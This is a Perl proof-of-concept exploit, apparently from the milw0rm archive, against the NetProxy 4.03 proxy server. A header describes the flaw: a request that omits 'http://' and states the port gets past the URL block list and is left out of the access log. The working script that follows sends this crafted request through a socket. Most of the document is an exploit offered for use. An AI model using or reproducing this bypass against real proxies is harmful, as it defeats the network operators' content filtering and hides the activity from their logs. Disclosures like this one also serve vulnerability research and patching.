#!/usr/bin/perl
###########################################################################
#
# Application:
#
# NetProxy 4.03
# http://www.grok.co.uk/netproxy/index.html
#
# Description:
#
# NetProxy includes a powerful web cache to boost
# performance and reduce online costs. There is
# also an application-level firewall to protect your
# network from unwanted access, full access logging
# to allow you to track Internet usage, and
# password-protected access to various Internet resources.
#
# Vulnerability:
#
# Sending a specially crafted request to the proxy server
# allows users to view restricted Web content and bypass
# the logging feature.
#
# Exploit:
#
# Assume that access to http://www.milw0rm.com has been blocked.
# The standard query string sent to NetProxy looks like:
#
# GET http://www.milw0rm.com HTTP/1.0
#
# NetProxy recognizes that this is a blocked URL and subsequently
# blocks the request. However, sending a request without 'http://'
# in the URL allows access to the blocked URL (note that the port
# must be manually specified as well):
#
# GET www.milw0rm.com:80 HTTP/1.0
#
# In addition, requests made in this manner are not logged to
# NetProxy's connection log file.
#
# Work-Around/Fix:
#
# Since the application automatically prepends the 'http://' string
# to every URL specified in the block list, this technique should work
# for all restricted Web sites, and ensures that there is no easy fix
# for this security hole. POC code follows.
#
# Credit:
#
# Exploit discovered and coded by Craig Heffner
# http://www.craigheffner.com
# heffnercj [at] gmail.com
###########################################################################
use IO::Socket;
#Define the NetProxy server and port
$proxy_ip = "127.0.0.1";
$proxy_port = "8080";
#Set the site, port and page to request
$site = "www.milw0rm.com";
$port = "80";
$page = "index.html";
#Define FF and IE user agent strings
$ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
#Create connection to NetProxy
my $sock = new IO::Socket::INET(
Proto => 'tcp',
PeerAddr => $proxy_ip,
PeerPort => $proxy_port,
);
die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n" unless $sock;
#Format the request
$request = "GET $site:$port/$page HTTP/1.0\r\n";
$request .= "User-Agent: $ms_ff\r\n";
$request .= "\r\n";
#Send the request
print $sock $request;
#Read the reply
while(<$sock>){
$reply .= $_;
}
close($sock);
#Separate NetProxy header from HTML
($header,$html) = split("\r\n\r",$reply);
print $html;
exit;
# milw0rm.com [2007-02-27]